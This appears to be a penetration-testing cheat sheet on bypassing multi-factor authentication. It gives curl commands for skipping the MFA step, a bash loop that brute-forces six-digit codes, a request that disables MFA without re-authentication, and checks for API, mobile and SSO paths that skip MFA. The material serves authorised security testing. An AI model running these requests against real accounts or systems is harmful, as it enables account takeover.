Skip to main content

MFA Bypass

CWECWE-308
Toolsburp, jwt_tool
Difficulty🔴 advanced

Bypass MFA​

Skip the MFA Step​

After completing password authentication, attempt to access post-MFA endpoints directly without completing the MFA challenge.

# Step 1: Complete password authentication
curl -X POST "https://TARGET/login" -d "username=test&password=test" -c cookies.txt

# Step 2: Skip MFA -- go directly to protected resource
curl -b cookies.txt "https://TARGET/dashboard"

# Also try:
# - Manipulating state/step parameters in the request
# - Removing MFA-related cookies or tokens
# - Accessing the API directly instead of the web flow

Brute Force MFA Codes​

# 6-digit TOTP = 1,000,000 combinations
# 30-second window typically accepts 2-3 codes
for code in {000000..000100}; do
    response=$(curl -s -X POST "https://TARGET/mfa/verify" \
        -b "session=$session" \
        -d "code=$code")
    echo "Code $code: $response"
done

# Check for rate limiting on the MFA endpoint specifically

Exploit MFA Implementation Flaws​

  • Response manipulation: Intercept the MFA verification response. Can you change a failure to success?
  • Backup code abuse: Are backup codes single-use? Can unlimited codes be generated? Are they predictable?
  • MFA removal without re-auth: Can MFA be disabled from settings without re-entering the password or current MFA code?
curl -X POST "https://TARGET/settings/mfa/disable" -b cookies.txt

Find MFA Scope Gaps​

MFA often applies inconsistently across authentication paths:

  • API endpoints may not require MFA
  • Mobile app endpoints may skip MFA
  • OAuth/SSO flows may not enforce MFA
  • Remember-me tokens may bypass MFA entirely
# Test API login path separately
curl -X POST "https://api.TARGET/v1/login" \
    -d '{"username":"test","password":"test"}' \
    -H "Content-Type: application/json"